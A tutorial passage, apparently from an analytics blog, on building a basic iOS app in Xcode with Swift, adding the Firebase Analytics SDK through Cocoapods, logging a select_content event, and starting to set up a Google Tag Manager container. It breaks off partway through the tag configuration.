Introduction: Control Anything Remotely With Infrared Signals.
Who would have thought that just about every Arduino attachment can be controlled in some way with a TV remote? Now its time to find out how.
Step 1: Setup and Materials
The setup for this is quite basic. The real challenge is finding neat products for this and writing the code.
Materials.
1x Arduino
1x Servo available @ Hobbyking Sparkfun etc.
Jumper wires
1x Infrared receiver diode available @ Sparkfun Allelectronics Radioshack etc.
4x AA Battery and holder Ebay is the cheapest for the holder
1x TV remote
Anything that you want to control
See the attached sketchup for the setup. If you do not have sketchup you can download it here.
Step 2: Values
The first thing to do is load the below code on to the arduino and open the serial monitor.
Next press a button on the remote aimed at the receiver to see the value printed. Ignore the first value that you see as it may by off.
#include <IRremote.h>
int RECV_PIN = A0; // Analog Pin 0
IRrecv irrecv(RECV_PIN);
decode_results results;
void setup()
{
Serial.begin(9600);
irrecv.enableIRIn(); // Start the receiver
}
void loop() {
if (irrecv.decode(&results)) {
Serial.println(results.value, HEX);
irrecv.resume(); // Receive the next value
}
}
Step 3: Code
Now that you have the values for each button on your remote you can control the servo. Below is also code that you can do without a servo and instead just control the LED on digital pin 13.
You will need to download the infrared library from if you do not have it already.
You may recognize some of this code, and that is to keep everything simple. I am using code widely available on the internet largely from arduino.cc and so that if anyone has questions they can look it up for more reference.
LED code
#include <IRremote.h>
unsigned long someValue = 0xXXXXXXXX; // where XXXXXXXX is on our your remote's values.
int RECV_PIN = 11;
IRrecv irrecv(RECV_PIN);
decode_results results;
int led = 13;
// the setup routine runs once when you press reset:
void setup() {
Serial.begin(9600);
irrecv.enableIRIn(); // Start the receiver
// initialize the digital pin as an output.
pinMode(led, OUTPUT);
}
// the loop routine runs over and over again forever:
void loop() {
if (irrecv.decode(&results)) {
Serial.println(results.value, HEX);
irrecv.resume(); // Receive the next value
}
if(results.value == someValue) {
digitalWrite(led, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(led, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
}
Servo code
#include <Servo.h>
#include <IRremote.h>
unsigned long Value2 = 0xXXXXXXXX; // where XXXXXXXX is on our your remote's values. We will call this Value 1
unsigned long Value1 = 0xXXXXXXX(179);
}
if(results.value == Value1) {
servo1.write(1);
}
}
Step 4: Remotely Control Your Life
Everything should be working now. Load the servo code and watch it twist and turn to the values you loaded on the arduino. At this point you could control an entire robot with a TV remote or control appliances. The world is open to being controlled entirely by you with infrared signals.
Please let me know if you have any more ideas or what you have done with infrared signals. Enjoy!
My CODE wont work, can somebody help... It says
Arduino: 1.6.4 (Windows 8.1), Board: "Arduino Uno"
sketch_nov11a:5: error: 'IRrecv' does not name a type
sketch_nov11a:6: error: 'decode_results' does not name a type
sketch_nov11a.ino: In function 'void setup()':
sketch_nov11a:8: error: redefinition of 'void setup()'
sketch_nov11a:1: error: 'void setup()' previously defined here
sketch_nov11a:11: error: 'irrecv' was not declared in this scope
sketch_nov11a.ino: In function 'void loop()':
sketch_nov11a:15: error: 'irrecv' was not declared in this scope
sketch_nov11a:15: error: 'results' was not declared in this scope
sketch_nov11a.ino: In function 'void loop()':
sketch_nov11a:21: error: redefinition of 'void loop()'
sketch_nov11a:14: error: 'void loop()' previously defined here
'IRrecv' does not name a type
"Show verbose output during compilation"
enabled in File > Preferences.
please somebody
but haded a lot of problems with the variable and hexadecimal values
Cool.
Good Tutorial Man! (Y)
I made something alike using an old TV remote to control several LED lights completely. Playing with Remotes and Signals is really AWESOME! \\m//
HELP I UPLOAD THE SKETCH TO GET SERIAL VALUES AND I OPEN SERIAL MONITOR AND PRESS BUTTONS BUT IT DONT WORK!!!!
Hello!
I have a great idea to use this for a school project
For the project we have to make a small wooden truck
i am making a rocket transporter
I had the idea of making the rocket move upand down at an angle
Ill try and add images when im done
Thanks for the guide though!!!
I am trying to control a owi robotic arm via a IR remote. I have got the arm to move but as soon as my remote starts sending the FFFFFFFF repeat signal my sketch doesn't recognise it and the motor stops. What is the best way to interpret this signal into my sketch?
hey, thanks for your tutorial .
But i m facing one major problem i.e.
when i fetch the IR code with help of SM0038 in fluorescent lamp light it fetch wrong code. without light it works correctly .
Please help me .......
I finally figured it out but it is only picking up zeroes no matter what button I push on a multitude of remotes.
It sounds like you are using it as a button. What pin do you have it attached to? Perhaps try of the PWM pins such as 10 or 11. When you downloaded the library and dropped it into the Arduino folder on your computer there should be a file inside called IRremoteInt.h Inside of that is where you change Wprogram.h to Arduino.h
Can you send me a screen shot of your program with any of the error messages? Sorry this is causing you so much trouble.
Dear Hammock
I have small issue with controlling servo with remote and will really appreaciate for your help.
I have implemented IRremote to control hobby king Digital Servo motor.Problem I am facing is that there is lot of Servo jittering. It makes sufficient noise.Did you face this problem? I am trying to maintain position of servo to 90 degree in the loop.(Without Iremote is works fine) Can you please let me know whether do you have any solution to elimiate Servo motor jittering?
Thank you in advance.
I downloaded the library and put it into the Arduino library folder. I copied your code into a sketch and when i tried to upload it i get a < 'IRrecv' does not name a type > error when compiling. I'm not sure what this means ( still pretty new to the Arduino / C++ platform.
I had this exact same problem and spent way to much time trying to fix it. Fortunately there is any easy fix. Open up the Infrared library and change
#include
to
#include
in IRRemoteInt.h.
Please let me know if that doesn't work.
For some reason not all of the text posted. The attached photo shows what you need to change in the Infrared library.
I did this but when i try to save it, I am given a message that says access denied. I am the Admin of my computer so I have no idea why.
You could create a new admin account for all of your arduino projects?
I had this exact same problem and spent way to much time trying to fix it. Fortunately there is any easy fix. Open up the Infrared library and change (see picture).
Please let me know if that doesn't work.
opened the IRremoteInt.h in text edit and changed the code but i am still receiving the same error message when compiling. any other thoughts?
i deleted the library and re-downloaded it and then change the code again and now it seems to be working fine. thanks. this is going to be the main controls on all my robots for a while.
I can not get this program to work no matter how hard i try. I've downloaded the library and no matter what I do, it gives me multiple errors.
Have you gone into the library and changed to . I know this gave me an hour of frustration before I changed it.
What I was typing disappeared. Anyway if you go into the library at the top you should see WProgram.h in-between greater than, less than signs. If you have not already change that to Arduino.h
Do I find this in the library going through my program files or do I change it in the program itself? I had a little difficulty understanding what you meant.
Do I have to use a ground terminal on the IR reciever? I have two IR recievers and they only have positive and negative.
Can you send me the link to the data sheet? It sounds like each ground will plug into an analog pin and then you will have to use the analogRead() function.
One more question. i have been trying to use this code along with code for the Arduino motor shield. the two codes by their self work fine but when put together the motor shield does not work. could there be any conflicting pins or variables that might be interfering?
There is a list of pins that the motor shield uses at
one of them is A0 it also uses A1 so try A2 and see what happens.
After reading the motor shield page again it might be better to try using pin A4.
Hello. This project is a great ideea, tough it sould de more specific since, i guess, you entered for te arduino challenge. Nvermind, i woud like to ask if you could control more than one servo with this. Thanks.
You can control up to 12 servos on an arduino (6 on PWM and 6 on analog pins using the servo library). So if you had a remote control with 24 buttons then each servo could have two different values it would move it individually. For example if you pressed the power button on the remote then servo 1 could move to 160 degrees. Then you could press the #2 button and that same servo would move to 50 degrees. All the while the rest of the servos would remain unchanged. To do this in the code you will need 24 unsigned longs (1 for each of the 24 buttons on the remote control. Please Let me know if this is not clear or if you have any questions.
I had this idea too, but I wanted to wire it into my light switches should I could just point and turn off the light when watching a movie.
You could definitely do that as long as the path to the infrared receiver is not blocked by any solid objects. Great idea.
|
http://www.instructables.com/id/Control-anything-remotely-with-Infrared-signals/
|
CC-MAIN-2017-39
|
refinedweb
| 1,855
| 74.39
|
Unanswered: Appearance Design Pattern - uh, now what do I do with it?
Unanswered: Appearance Design Pattern - uh, now what do I do with it?
Ok, so I have some code running based off the Appearance Design Pattern article. The bulk of the code involved as I have it running is on the article's page, and also mentioned a bunch in this thread.
I've changed my Entry Point class, though, to look as follows:
PHP Code:
public class GWT3BetaTest1 implements EntryPoint {
public void onModuleLoad() {
VerticalPanel panel = new VerticalPanel();
panel.add(new Label("Hello there!"));
panel.add(new AppearancePushButton("An AppearancePushButton"));
RootPanel.get().add(panel);
}
}
All well and good.
Now, what do I do with it?
There's two points to that, I guess:
1) The Sencha article shows as the Appearance interface the following:
PHP Code:
public interface Appearance {
void render(SafeHtmlBuilder sb);
void onUpdateText(XElement parent, String text);
void onUpdateIcon(XElement parent, Image icon);
}
PHP Code:
public abstract static class Appearance {
public void onHover(Context context, Element parent, String value) {}
public void onPush(Context context, Element parent, String value) {}
public void onUnhover(Context context, Element parent, String value) {}
public void onUnpush(Context context, Element parent, String value) {}
public abstract void render(Context context, SafeHtml data, SafeHtmlBuilder sb);
}
What determines what methods and signatures can exist for an Appearance interface? Can I simply add an onHover and an onUnhover for the Appearance interface (and corresponding class that implements it)? How do I know what parameters they should have? etc.
For example, I'd like my "AppearancePushButton" class to have some sort of change in its look when I hover, and want to know how to do this with appearances.
2) How do I use this to be able to swap Appearances? Would each class of my own that I create need its own internal Appearance interface, and potentially multiple DefaultAppearance classes inside? Do I create a stand-alone Appearance interface, multiple implementations of it, and swap in and out which one I use with the "replace-with" directive in the project xml file? Can a single Appearance interface and a single implementation of it cover everything all my classes would need?
3) What about classes that already exist? How do I apply this, to say, the GXT 3.0 Window class? I want the borders, titlebar, and background to have different than the default colors - how do I do this with Appearances?
Thanks in advance... if there's some sort of reference guide that covers this, I'd be more than happy to use that . . I apologize if I'm coming off as needing a bit of hand-holding.
- Join Date
- Feb 2009
- Location
- Minnesota
- 2,634
- Answers
- 107
- Vote Rating
- 79,634
- Answers
- 107
- Vote Rating
- 79]
|
http://www.sencha.com/forum/showthread.php?170856-Appearance-Design-Pattern-uh-now-what-do-I-do-with-it&s=566fa02ab46b3e02f5b361ef6e0080ac&p=708318
|
CC-MAIN-2014-15
|
refinedweb
| 459
| 54.02
|
What are the Web Services and how to create a Web Service in ASP.NET?
by GetCodeSnippet.com • May 25, 2013 • Microsoft .NET Web Services, Microsoft ASP.NET • 1 Comment
What is a Web Service?
A Web Service is a software program that uses XML to exchange information with other software via common internet protocols. Web Service is way to interact with other object via internet. It is an application that is designed to interact with other applications. Web services allow servers to expose its functionality and clients can use this functionality according to their requirements.
In plain words we can say that it is a method of communication between two devices over the internet. A web service is function that can be accessed by other programs via internet. So the target of web services is not humans rather other programs. Web Services are protocol, platform and language independent and it is based on XML so all the communication is in XML.
Web Services Technologies
Web services use following technologies.
XML (Extensible Markup Language)
It is a markup language that provides standard rules to encode data to carry via internet. It allows users to define their own tags rather than predefined tags.
SOAP (Simple Object Access Protocol)
It is based on XML and it actually the communication protocol. It provides communication mechanism between web services and applications via internet.
WSDL (Web Services Description Language)
It is also based on XML and it is used to describe and locate Web Services.
UDDI (Universal Description, Discovery and Integration)
It is actually the directory for storing information about web services and web services interfaces.
- Open Visual Studio 2010 and Select New Website form File > New
- Now Select Add New Item from Website and select Web Service
- You will see following window on your screen.
- A WebMethod HelloWorld() is already there but you can write your own web methods as I have written Multiply() web method. This method takes two integer parameters, multiplies them and returns integer value.
Two important things to note here are System.Web.Services namespace and [WebMethod] attribute. You must have to use System.Web.Services namespace and specify [WebMethod] attribute top of the every method you want to expose as part of the web service. You must also need to declare these methods “public”.
- Press F5 and you will see following in your browser.
- You can test the web service by clicking on “Multiply”.
- Now provide two values and click on “Invoke”.
- You will see the result like this.
Thanks for sharing detailed information about web services. This is quite helpful.
|
http://getcodesnippet.com/2013/05/25/what-are-the-web-services-and-how-to-create-a-web-service-in-asp-net/
|
CC-MAIN-2019-51
|
refinedweb
| 432
| 58.38
|
MAKEDEV(3) Linux Programmer's Manual MAKEDEV(3)
makedev, major, minor - manage a device number
#include <sys/sysmacros.h> dev_t makedev(unsigned int maj, unsigned int min); unsigned int major(dev_t dev); unsigned int minor(dev_t dev);makedev(), major(), minor() │ Thread safety │ MT-Safe │ └────────────────────────────┴───────────────┴─────────┘
The makedev(), major(), and minor() functions are not specified in POSIX.1, but are present on many other systems..
mknod(2), stat(2)
This page is part of release 4.12 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. Linux 2016-03-15 MAKEDEV(3)
Pages that refer to this page: mknod(2), stat(2), udev_device_new_from_syspath(3)
|
http://man7.org/linux/man-pages/man3/minor.3.html
|
CC-MAIN-2017-30
|
refinedweb
| 119
| 57.27
|
Sure, I understand that in older versions of Oracle, before the ALTER SESSION SET CURRENT_SCHEMA option was available, synonyms could be used to more easily "repoint" code to different schemas for testing purposes.
ALTER SESSION SET CURRENT_SCHEMA has been around since at least version 8i of the database. 8i was released in 1999, shortly after I started using Oracle, so I've never seen the need for synonyms.
As Tom Kyte has said:
I've been recommending the alter over synonyms for a while.
I don't like synonyms (not even a big fan of the alter -- believe the schema should be qualified in the app but anyway...)
Alter is the lesser of two evils.
This week I finally created a local synonym, and realized why I dislike them... and a few other things.
Here's why I created one:
We've got a "large" datamart where I implemented the code and staging area as a separate schema from the facts and dimensions. That separation is a good thing. But one of the table names I'd created was long, and I was getting annoyed continually retyping it.
Normally, I'd just created a view... but I realized that if I added columns to the table, I'd need to re-create the view. But I wouldn't if I created a synonym. So I did.
Then I asked myself: why haven't I done this before? What's annoying me?
Here's why I hated it:
I realized that I hate synonyms because there's no easy way to list them by functionality.
Here's what I mean. I can easily query a list of tables and views. I look for them because I typically want to write queries using them.
Synonyms are in the same namespace. As the Oracle documentation says:
The following schema objects share one namespace:
Tables
Views
Sequences
Private synonyms
Stand-alone procedures
Stand-alone stored functions
Packages
Materialized views
User-defined types
That's a lot of different functionality in the same namespace.
I don't query procedures or packages. Frankly, I'd like some common list of queryable objects, e.g. tables, views, materialized views, and synonyms that point to tables, views, etc.
Yes, I'd like:
1. a list of USER_QUERYABLE_OBJECTS or some such.
2. namespaces listed in USER_OBJECTS, as grouping of OBJECT_TYPE values.
So that's why I dislike synonyms. If I didn't create the synonym or wasn't told about the synonym, it's not "obvious" (to me) to look for them.
Maybe it's just me, but I'm inclined to agree with Tom Kyte's statement about synonyms quoted earlier.
|
https://it.toolbox.com/blogs/ganotedp/why-i-hate-synonyms-060912
|
CC-MAIN-2018-13
|
refinedweb
| 443
| 66.84
|
java.lang.Object
oracle.jbo.common.ampool.PoolTesteroracle.jbo.common.ampool.PoolTester
public class PoolTester
The PoolTester class provides a sample implementation and use of Application Module Pooling in LOCAL mode. This example uses the default implementation of Application Module Pooling.
View implementation of PoolTester
Create the pool TestAMPool. Since PoolMgr is a singleton object, use PoolMgr.getInstance to get it. Use createPool to create the pool. Notice that createPool requires the name of the pool, the name of the package that contains the Application Module, the connect string to the database, and env, the hashtable. The createPool method is overloaded; an alternative version takes an additional parameter that lets you override the default implementation of Application Module Pooling and specify your own.
Create a second pool, SecondAMPool that connects with the same environment variables, but to an Application Module in a different package.
PoolMgr.getInstance().getPool("TestAMPool") gets a handle to the pool to work with it.
Checkout three instances. Note that the classes ApplicationPoolImpl and PoolMgr contain other functions that you can use to traverse the pool content. The ampool package also contains a PoolAdministrator Web Bean that you can use to dump the contents of the pool.
Get a handle to the second pool, check out two instances, then check in one.
Use removePool to remove the Application Module Pool. This function calls remove() on all of the Application Module instances, including ones that are currently checked out and in use, and causes them to disconnect from the database and remove all of their View Objects.
The next part of the program defines a class, CustomPool, that ensures that no more than three instances are checked out of the pool at any time. In this case, the definition of the checkout method is overridden to check that no more than three instances are checked out. If more than three are checked out, an exception is thrown.
This custom pool class is then used in a program which attempts to create more than three instances. The try-catch loop is set up to start checking out instances and to catch exceptions. When an attempt is made to create the fourth instance, an exception is thrown.
public PoolTester()
public void doTest() throws java.lang.Exception
java.lang.Exception
public static void main(java.lang.String[] args)
args- arguments to the PoolTester sample implementation.
|
http://docs.oracle.com/cd/E28280_01/apirefs.1111/e10653/oracle/jbo/common/ampool/PoolTester.html
|
CC-MAIN-2016-40
|
refinedweb
| 394
| 56.35
|
REACT Lists and Keys
Introduction
React lists and keys are among the most basic concepts. This may be the most troubling step for beginners who are just getting started with the React framework. What's scarier is that you can't avoid using lists because practically every application has repetitive content.
But, in practical terms, react lists and keys are pretty simple. All that is required is for it to be conveyed properly. Lists are an essential element for any application. Lists are used in almost every application in some way or another. You may have a task list similar to a calendar app, a photo list similar to Instagram, a shopping cart list, and so on. There are several applications. Lists in an application might be resource-intensive. Imagine an app with a vast list of videos or photos, and as you scroll, you keep getting hundreds more. This could have a negative impact on the app's performance.
Because performance is crucial, you should ensure that any lists you use are built to be as efficient as possible.
Did you know that when using lists in React, each list item needs its own unique key? Let's learn more about React lists and keys, as well as how to use them correctly.
React Lists
Almost every project I've ever worked on included a list of elements. React also makes it a lot easier to render lists in JSX by supporting the Javascript .map() technique.
In Javascript, the .map() method iterates through the parent array, calling a function on each element. Then it creates a new array containing the values that have been changed. It does not affect the parent array.
React Keys
One more thing is required when establishing a list of elements, and that is a key.
The element's key is a specific property that must be included in the element, and it must be a string. Each list's key should be distinct, which means you shouldn't use values that are identical to the key.
Each item within an array must have a unique key, but the key need not be globally unique. The same key can be used across various unrelated components and lists. To put it differently, keys should be unique among siblings rather than globally.
For example, you should not use status or text as a key because they are not identifiers.
The element's key serves as a form of identifier for React, allowing it to figure out which element was updated, added, or removed.
It's a good idea to pick a value that serves as a unique identifier for each item in the array, which is usually the ID.
Creating a basic List component
Lists are commonly used to show lists on websites and are used to display data in an ordered way. Lists can be generated in React in the same way that they are in JavaScript. Let's look at how Lists are transformed in regular JavaScript.
The traversal of lists is done with the map() function.
function ListComponent(props) { const listItems = myList.map((item) => <li>{item}</li> ); return ( <ul>{listItems}</ul> ); } const myList = ["Lotus", "Rose", "Sunflower", "Marigold", "Lily"]; ReactDOM.render( <ListComponent myList={myList} />, document.getElementById('root') );
The code above shows a ListComponent that renders a list of props provided to it. We called the ListComponent in the render() method and handed it a list called myList as props. The following is the outcome of this code:
Lotus Rose Sunflower Marigold Lily
When you run this code, we'll notice that React issues a warning.
It's important to note that the caution here is about providing a unique key. Let us know how to use keys to increase the performance of your React application.
Use of React keys in React Lists
React uses keys to figure out which elements have changed (added, removed, or re-ordered). A key is necessary to give each element in the array a unique identity.
Let's rewrite the React code sample we saw previously in React lists to incorporate keys to better comprehend this.
function ListComponent(props) { const listItems = myList.map((item) => <li key={item.id}> {item.value} </li> ); return ( <ul>{listItems}</ul> ); } const myList = [{id: 'a', value: ‘Lotus’}, {id: 'b', value: ‘Rose’}, {id: 'c', value: ‘Sunflower’}, {id: 'd', value: ‘Marigold’}, {id: 'e', value: ‘Lily’}]; ReactDOM.render( <ListComponent myList={myList} />, document.getElementById('root') );
The key in this method is a one-of-a-kind string that identifies each item. Note that we've included a key for each list item in this code snippet above. Also, note that the original React list has been changed to be a value-id pair. A unique id is assigned to each item in the array. As a result, this is the id that is allocated to each object as a key. This is the most effective method for assigning unique keys to items on a list.
Is it better to use the index as a key in your project or not?
There are three conditions you must check, and they must all be met in order for you to utilize index as a key in your list with confidence:
- The list is never sorted or filtered.
- On the list or list items, you never make any changes or computations.
- The list's items have no identifiers(id).
Note: Using an index as a key may cause the component to behave in an unexpected way. The order of items may change, hence utilizing indexes as keys are not recommended. This can have a negative impact on performance and cause component state difficulties. If you don't set an explicit key to a list item, React will use indexes as the default key.
Extracting Components with keys
Consider the following scenario: we've constructed a separate component for list items, and we're extracting list items from it. We'll have to assign keys to the component we are returning from the iterator rather than the list elements in that case. That means, instead of assigning keys to <li>, we should assign them to <Component />. To avoid making a mistake, remember that anything we return from the map() function must be assigned a key.
Keys make sense only in the context of the surrounding array.
For example, if you're extracting a ListItem component, you should preserve the key on the array's <ListItem /> elements rather than the <li> element in the ListItem itself.
Great, now that we know a lot about keys, let's look at how we can generate unique keys if you don't already have them in your data.
Generate unique React keys
Let's say the data you're working with doesn't include any unique values, such as ids or other identifiers, and you really need to utilize something other than the index value. If that's the case, there are at least two options.
- Create the key on your own.
A simple Javascript code can be written to generate a random integer or string. To produce a random integer, you can also use a new Date().getTime() Javascript methods, add any prefix and use it as your key.
- Make use of a plugin that already exists.
For generating unique keys for React lists, there are a few options. The shortid ‘generate()’ technique is one that we can use but since this is deprecated we can use nanoid instead. ‘uuid’ and ‘uniqid’ are two others that come highly recommended. They're all really straightforward to set up and operate.
Nanoid is highly recommended as it is 2 times faster than ‘uuid’, safe, secure, URL-friendly, and is a unique string ID generator for Javascript.
These methods will solve almost all the problems with React lists and keys.
A "key" prop should be assigned to each child in a list
The final point to make in this article concerns the most typical and persistent mistake you'll encounter in the console when developing.
If you encounter the following error ‘Each child in a list should have a unique key prop…’, you already know that the only option is to give each of your list items a unique key.
Even if you've already allocated the key, the issue could indicate that one of the keys isn't unique. To overcome this, you must use one of the above-mentioned ways in “Generate unique React Keys” to ensure that your key value is unique.
Frequently Asked Questions
- What is the use of React Lists?
Lists are generally used to present data menus on websites and are used to display content in an ordered way. Lists can be generated in React in the same way that they are in JavaScript. The traversal of lists is done with the map() function.
2. What do you mean by React Keys?
The React key is a unique identifier. It's used in React to figure out which items in the Lists have changed, been updated, or been removed. It's beneficial when we've added components dynamically or when users change the lists. It also assists in determining which components in a collection need to be re-rendered rather than rendering the complete collection each time.
To provide the elements a stable identity, keys should be given inside the array.
3. Are React keys and props the same thing?
The keys and props are not the same thing; the process of assigning "key" to a component is the same. Keys are internal to React and, unlike props, cannot be accessed from within the component. As a result, we would need to pass the key as another prop.
Key Takeaways
In this blog, we went over the fundamentals of React lists and keys. We also learned how to create a list in React JSX and what keys are, and why they're important to include.
We also learned about the many ways for creating unique ids and why key uniqueness is critical in some instances. Let's review the main points of this article of react lists and keys.
- Lists are resource-intensive and should be utilized with caution.
- Make sure that each and every item in the list has its own key.
- It is preferable not to utilize indexes as a key unless you are certain that the list is static (no additions, reordering, or removals).
- To generate a key, never use insecure keys like Math.random().
- If unstable keys are utilized, React will experience performance degradation and unexpected behavior.
Enroll in our Advance Front-end Web Development Course- React.js to deeply understand the concept of React lists and keys in Web Development.
Credits: GIPHY
Happy Developing!
|
https://www.codingninjas.com/codestudio/library/react-lists-and-keys
|
CC-MAIN-2022-27
|
refinedweb
| 1,785
| 73.07
|
A while ago, I published an article on how to build an Android application, and bundle it with Firebase. The purpose of that article, and the one you are reading now, is to slowly introduce the world of mobile app development and Firebase, given the latter is getting more and more traction as Google’s go-to analytics platform.
After finishing work on the Android guide, I immediately started working on its counterpart for iOS, and that’s the one you’re reading now.
The process is essentially the same. We’ll develop the application using Mac’s own integrated development environment (Xcode), and the steps to create and integrate Firebase and Google Tag Manager deviate only very little from Android.
I’ve also created a video you can watch if you prefer.
The Simmer Newsletter
Follow this link to subscribe to the Simmer Newsletter! Stay up-to-date with the latest content from Simo Ahava and the Simmer online course platform.
What you’ll build
We’ll build an iOS application using the Swift programming language. The application will be built with Xcode, so you’ll need to use a Mac computer for this as there’s no native support for Xcode on other platforms.
Next, we’ll create a Firebase project, and connect it to a Google Analytics account. After doing this, your application will automatically collect some events.
We’ll add a simple
select_content event, which will be logged in Google Analytics for Firebase.
Finally, we’ll create a Google Tag Manager container, and have it listen for the
select_content event, and then duplicate its content to a Universal Analytics endpoint.
The application we’ll create will be hideous and feature-bare. Creating a flashy app is not the point here. I want to show you how easy it is to get started, and you can use even this simplest of applications to play around with Firebase in order to learn how it works.
Step 1: Create a project in Xcode
Let’s get started!
Go to the Applications folder of your Mac and launch Xcode.
Click on File -> New -> Project to create a new Xcode project.
Choose the Single View App as the template, and click Next.
In the next screen, give the product a name such as
My Test Application. If you want to run the application on a physical device, choose yourself from the Team drop-down. If the Team dropdown doesn’t show your name (as configured on your Apple ID), follow the options to create a personal team with your Apple ID.
Note! You only have to do this if you want to run the application on your physical device. We’ll be using a simulator in the examples so you can ignore the Team drop-down as well.
You can give a custom Organization Identifier, as that makes it easier to remember your bundle identifier (which you’ll need when creating the Firebase project).
Make sure Swift is selected as the language, and when ready click Next.
Finally, navigate to the directory where you want to create the project in. In my example, it’s a directory named
ios-test.
Click Create when done.
Xcode will now proceed to create your project. Once done, it will open the project’s general settings and show you the project structure in the left.
Before we run our app for the first time, let’s add some heart to it. Click Main.storyboard to open the visual editor for the application’s user interface.
Click the Object Library icon in the top bar of Xcode, and type
text in the search bar that appears. Drag-and-drop the Text Field item into the middle of the view.
Double-click the Text Field in the view, and type in
Hello World!. You can reposition the field if you wish - though it won’t make it any prettier. This is what it should look like:
Now that we’ve created a beautiful user interface, we can run the application. Choose a phone model, e.g. iPhone 6 from the device menu, and click the Play button to build the application and run the simulator.
It’s going to take a while for the application to start, but once it does, you’ll be able to see it in the emulator window (it’s a different application that starts so remember to switch to it).
Congratulations! You’ve built the iOS application we’ll use as the testbed in this article. In the next step, we’ll configure Firebase!
Step 2: Create a Firebase project
Here, I’ll recommend you follow the exact same steps as in the Android article. Open this link in a new browser tab to learn how to create the Firebase project. Once the project is created, switch back to this article.
Step 3: Deploy Firebase SDK in application
Once you have the project created, you’ll need to integrate it into your iOS application.
Click the iOS icon in the middle of the Project Overview dashboard.
In the iOS bundle ID field, copy-paste the Bundle identifier you can find in Xcode by first selecting your project, and then looking in the Identity section of the General tab of your project settings.
Give the app a nickname such as
My iOS App if you wish, and then click Register app.
In the next screen, download the GoogleService-Info.plist file, and then drag-and-drop it to the project directory in Xcode (the yellow folder). You should see a screen like this, so make sure to check all the options as in the example.
You should end up with the file within the project directory.
In the web browser, click Next when done.
Now you need to add the Firebase SDK to your project. To do that, you need to initialize a Podfile to manage your application’s dependencies.
Open the Terminal application, and browse to your project root, i.e. the directory which has the
My Project Name.xcodeproj file. In this directory, type this and hit enter:
sudo gem install cocoapods
It’s a super-user command, so you’ll need to input your admin password. This installs the latest version of Cocoapods, the dependency manager for iOS.
Once done, type this and hit enter:
pod init
If you now list the contents of the directory with
ls, you should see a new
Podfile listed among the files and folders.
Open the Podfile in a plain text editor. You can open it in Mac’s TextEdit by typing
open Podfile in the console while in the directory with the Podfile.
Under the
# Pods for <my project>, add the following two lines:
pod 'Firebase/Analytics' pod 'GoogleTagManager'
This is what it should look like:
Once done, save the file and close it.
Now, in the Terminal, while in the same directory as the Podfile, type the following command and press Enter.
pod install
You should see a bunch of dependencies being installed, including Firebase and Google Analytics / Tag Manager modules.
You should now see a new file in this directory, named
Your Project.xcworkspace. From now on, you’ll need to use this instead of the
Your Project.xcodeproj file when working on the project in Xcode. The workspace bundles the Pods you downloaded together with your project, and lets you build an application that includes all the modules you have indicated as dependencies.
So go ahead and close Xcode and the iOS simulator, and then re-open Xcode by opening the
Your Project.xcworkspace file.
If everything works as it should, you’ll now see both your project root and the Pods group in the project navigator.
Now, go back to the web browser with your Firebase SDK setup. As you’ve now added the SDK as a dependency, click the Next button.
The next step is to initialize the SDK in your application. Open Xcode, and then click the AppDelegate.swift class file to open it for editing.
Here, right after the
import UIKit statement, add the following line:
import Firebase
This imports the
Firebase set of modules. To initialize the Firebase SDK, add the following line of code into the
application method, just before the
return true statement:
FirebaseApp.configure()
This is what your AppDelegate.swift should look like after the changes.
Next thing to do is to save your changes and run the application in a simulator. So pick a phone model from the drop-down and then click the Play button again.
The application itself won’t show anything has changed, but you might see some new, Firebase-related items in the Xcode logs.
Note! You can also filter for
GoogleTagManagerto see evidence that the GTM dependency has loaded. However, since you don’t (yet) have a container added to the project, the only log will be a simple entry telling you that no container was found.
Once you’ve run the app and verified that Firebase is initialized, go back to the web browser to finish the SDK setup.
From the Add initialization code step, click Next to proceed to verification.
Now, if you’ve run your app in Xcode on a computer with internet access, this final step should shortly show a green checkmark to confirm you’ve initialized the Firebase SDK.
Nice work! Click Continue to console to finish the setup.
You now have a working Firebase installation running in your app. You can now actually visit Google Analytics, browser to your Firebase App + Web property for this project, and see your data in the StreamView report within.
However, let’s not get ahead of ourselves. In the next chapter we’ll add some Firebase event logging to the application!
Step 4: Add basic analytics to the application
Now, let’s add a simple Firebase event to our application.
Open the ViewController.swift class. This class controls the view (d’oh) where you added the “Hello World!” text to.
In this class, load the relevant Firebase dependency with the following import command added to the beginning of the file:
import FirebaseAnalytics
Next, at the end of the
viewDidLoad() function, add the following lines of code:
Analytics.logEvent(AnalyticsEventSelectContent, parameters: [ AnalyticsParameterItemID: "my_item_id" ])
When you want to send events to Firebase Analytics, you use the
Analytics singleton and its
logEvent() method.
This method takes two arguments: the event name and a list of key-value pairs in a
parameters list.
For the event name, you can provide a custom name such as
"my_custom_event", or you can utilize the standard events suggested by Firebase by accessing them through the
AnalyticsEvent.* enumerated namespace.
For the key-value pairs in
parameters, you can again use a custom key name such as
"my_custom_key", or you can use the suggested parameter names by accessing them through the
AnalyticsParameter.* enum.
We are using the
AnalyticsEventSelectContent enum, which returns
select_content at runtime, and we are using the
AnalyticsParameterItemID key, which returns
item_id at runtime.
Here’s what the modified ViewController.swift should look like:
Step 5: Debug and verify everything works
Before you run the app again, you’ll need to add some verbose logging to the console. Choose Product -> Scheme -> Edit scheme from the menu bar.
In the Arguments Passed On Launch, click the plus (+) symbol to add a new argument, and name it
-FIRAnalyticsDebugEnabled. This is what it should look like:
Now, run the app again. In the console logs, you should find the
select_content event by either scrolling to it or filtering for the event name.
You can now also visit your Google Analytics reporting view for the App + Web property created for this project, and scroll to the DebugView report. This will automatically include all devices for which the
-FIRAnalyticsDebugEnabled flag has been set. You should find your device (maybe with an odd name, though) in the Debug Devices list, and you should see a stream of events in the DebugView, together with the new
select_content event you just created.
Before we’re done, let’s fork this Firebase Analytics hit using Google Tag Manager, and send the copy to a Universal Analytics endpoint!
Step 6: Create and download a Google Tag Manager container
First, make sure you have a valid Universal Analytics endpoint. You need to create a Web property with a Mobile App view. The latter is what collects hits sent from your application.
Once you have the tracking ID (
UA-XXXXX-Y) at hand, you can head on over to to create your new iOS container.
In Google Tag Manager, create a new container in one of your accounts, or create a new GTM account first.
Give the container a name, e.g. My Test Application, and choose iOS as the type. Click Create when ready.
Click New Tag to create a new tag. Choose Google Analytics: Universal Analytics as the tag type.
Select Event from the Track Type list.
Add something to the Category field, e.g. Test Event.
In the Action field, start typing
{{ and then choose New Variable from the list.
Choose Event Parameter as the variable type.
